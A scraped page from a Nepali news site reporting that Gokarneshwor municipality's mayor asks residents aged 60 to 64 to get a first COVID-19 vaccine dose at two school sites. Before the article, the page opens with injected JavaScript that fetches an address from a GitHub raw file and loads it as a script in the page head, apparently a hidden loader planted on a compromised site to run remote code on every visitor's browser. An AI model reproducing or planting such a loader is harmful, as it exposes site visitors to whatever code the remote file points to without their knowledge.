;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोभिड बिरुद्धको खोप लगाउन मेयर सन्तोष चालिसेको अनुरोध, २ ठाउँमा स्थान तोकियो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कोभिड बिरुद्धको खोप लगाउन मेयर सन्तोष चालिसेको अनुरोध, २ ठाउँमा स्थान तोकियो
Breaking News

कोभिड बिरुद्धको खोप लगाउन मेयर सन्तोष चालिसेको अनुरोध, २ ठाउँमा स्थान तोकियो

जुनेली न्युज, काठमाडौँ – गोकर्नेश्वोर नगरपालिकाले मिति २०७८ बैशाख २५ देखि २९ गते सम्म कोरोना खोप लगाउने व्यस्था गरेको छ | नगरपालिका भरि  बसोबास गर्ने ६० देखि ६४ वर्षा उमेर समुहका व्यक्तिहरुलाई कोभिड -१९ बिरुद्धको पहिलो खोप लगाउनको लागि नगरपालिकाका प्रमुख सन्तोष चालिसेले सुचना निकाली आह्वान गर्नु भएको छ|

स्थान चामुण्डा मा.बी नारायणटार र सहयोगी मा.बी गोकर्णमा बिहान १ बजे देखि बेलुका ४ बजे सम्म खोप लगाइने छ |

साथै खोप लगाउन को लागि आफ्नो उमेर परिचय खुल्ने कागजात पनि संगै लिएर आउन अनुरोध गर्नु भएको छ | |

No description available.

फेसबुक प्रतिक्रियाहरु